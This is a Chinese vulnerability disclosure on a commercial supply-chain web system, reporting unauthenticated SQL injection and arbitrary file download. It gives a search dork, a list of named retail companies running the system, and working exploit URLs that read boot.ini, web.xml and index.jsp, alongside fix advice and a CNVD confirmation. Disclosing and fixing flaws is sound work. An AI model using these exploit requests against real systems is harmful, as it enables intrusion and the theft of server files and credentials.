某商业链系统通用SQL注入一枚，外加任意文件下载（无须登录）

技术支持:北京富基融通科技有限公司(http://**.**.**.**/)

程序名称：商业供应链系统

漏洞类型：SQL注入 & 任意文件下载

是否需要登录：否

漏洞文件：web/account/dxList.jsp （注入）

web/login/downloadAct.jsp（任意文件下载）

漏洞参数：id grpcode （注入）

FilePath （任意文件下载）

关键字：google & baidu intitle:商业供应链系统

影响用户：

可以参看开发公司的案例介绍： http://**.**.**.**/case_market.php

个人搜集了些案例：

北京奥特莱斯SCM商业供应链系统 
 **.**.**.**/web/epublic/upload.jsp 
 哈尔滨联强乐买SCM商业供应链系统 
 **.**.**.**/web/epublic/upload.jsp 
 北人集团_商业供应链SCM系统-超市 
 http://**.**.**.**:8081/web/epublic/upload.jsp 
 国光SCM商业供应链系统 
 http://**.**.**.**:8080/web/epublic/upload.jsp 
 家乐园供应链系统 
 **.**.**.**:8081/web/epublic/upload.jsp 
 商业供应链系统 
 http://**.**.**.**/web/epublic/upload.jsp 
 商业供应链系统 
 **.**.**.**:8081/web/epublic/upload.jsp 
 商业供应链系统 
 **.**.**.**/web/epublic/upload.jsp 
 商业供应链系统 
 **.**.**.**:8080/web/epublic/upload.jsp 
 沈阳新一城商场经营管理有限公司 
 **.**.**.**:8080/web/epublic/upload.jsp 
 新朝阳购物中心网 
 **.**.**.**:8080/web/epublic/upload.jsp 
 东方购物广场有限公司SCM系统 
 **.**.**.**:8000/web/epublic/upload.jsp 
 **.**.**.**/web/epublic/upload.jsp

利用方式：

1. SQL注入，直接用工具跑就可以了(Sqlmap)

web/account/dxList.jsp?id=1&grpcode=0&sstyle1=0

2. 任意文件下载：

web/login/downloadAct.jsp?FilePath=c://boot.ini&name=boot.ini

实例演示：

<b>一： SQL注入部分：</b>

#####实例1：

**.**.**.**/web/account/dxList.jsp?id=1&grpcode=0&sstyle1=0

####实例2：

东方购物广场有限公司SCM系统

**.**.**.**:8000/web/account/dxList.jsp?id=1&grpcode=0&sstyle1=0

####实例3：

商业供应链系统

**.**.**.**:8080/web/account/dxList.jsp?id=1&grpcode=0&sstyle1=0

####实例4：

**.**.**.**/web/account/dxList.jsp?id=1&grpcode=0&sstyle1=0

####实例5：

http://**.**.**.**/web/account/dxList.jsp?id=1&grpcode=0&sstyle1=0

二：任意文件下载漏洞

实例1：

**.**.**.**:8081/web/login/downloadAct.jsp?FilePath=D://java//web/WEB-INF//web.xml&name=web.xml

实例2：

**.**.**.**:8081/web/login/downloadAct.jsp?FilePath=D://java//web/WEB-INF//web.xml&name=web.xml

实例3：

**.**.**.**:8081/web/login/downloadAct.jsp?FilePath=D://java//web/index.jsp&name=index.jsp

实例4：

**.**.**.**/web/login/downloadAct.jsp?FilePath=D://java//web/index.jsp&name=index.jsp

实例5：

http://**.**.**.**:8080/web/login/downloadAct.jsp?FilePath=D://java//web/index.jsp&name=index.jsp

1. SQL注入过滤参数

2.任意文件下载： 限制下载文件的目录，加权限访问

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-07-06 11:14

厂商回复：

CNVD确认并复现所述情况，确认通用性，由CNVD尝试联系软件生产厂商，***（分机8887）无人接听，后将通报发送至网站邮箱servi** 中处置

最新状态：

暂无

1. 2014-07-01 22:05 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢！！)

   2

   高大上

   1#回复此人

2. 2014-07-02 09:49 | 小马 ( 实习白帽子 | Rank:90 漏洞数:23 | 无个性不签名)

   1

   前排围观

   2#回复此人